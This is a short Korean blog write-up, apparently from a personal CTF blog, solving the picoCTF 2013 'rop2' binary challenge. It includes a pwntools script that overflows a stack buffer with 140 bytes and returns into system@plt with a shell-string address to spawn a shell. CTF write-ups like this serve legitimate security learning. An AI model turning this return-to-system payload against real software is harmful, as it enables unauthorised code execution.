[pico CTF 2013] rop2

2018. 8. 16. 07:34CTF's Write-up

pico CTF 2013 ROP2번문제입니다.

보호기법 체크하기!



IDA로 까서 취약점을 찾아보겠습니다.



이전문제하고 똑같은 취약점이군요 ㅎㅎ

쉽게 풀릴 것 같아서 not_called함수로 들어가보겠습니다.    



어라... "/bin/bash"가 아니라 "/bin/data"로 바뀌어있네요.

당황 ㅋㅋㅋㅋ

조금더 살펴보니 system함수를 내부에서 호출하니, system함수로 ret를 주고, 인자로 "/bin/sh"를 주면 될 것 같습니다.


system주소 찾고,




"/bin/bash"가젯 찾고,



payload 작성하면?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
 
 
= process("./rop2")
system_plt = 0x80483a0
shell = 0x08048610
 
payload = ""
 
 
 
 
payload += "A"*140
payload += p32(system_plt)
payload += "AAAA"
payload += p32(shell)
 
r.send(payload)
r.interactive()
 
cs

(grin)

'CTF's Write-up' 카테고리의 다른 글

[pico CTF 2013] rop4  (0) 2018.08.16
[pico CTF 2013] rop3  (0) 2018.08.16
[TJCTF2018] - Cookie monster  (0) 2018.08.16
[pico CTF 2013] rop1  (0) 2018.08.15
[TJCTF2018] - Weird Logo  (0) 2018.08.15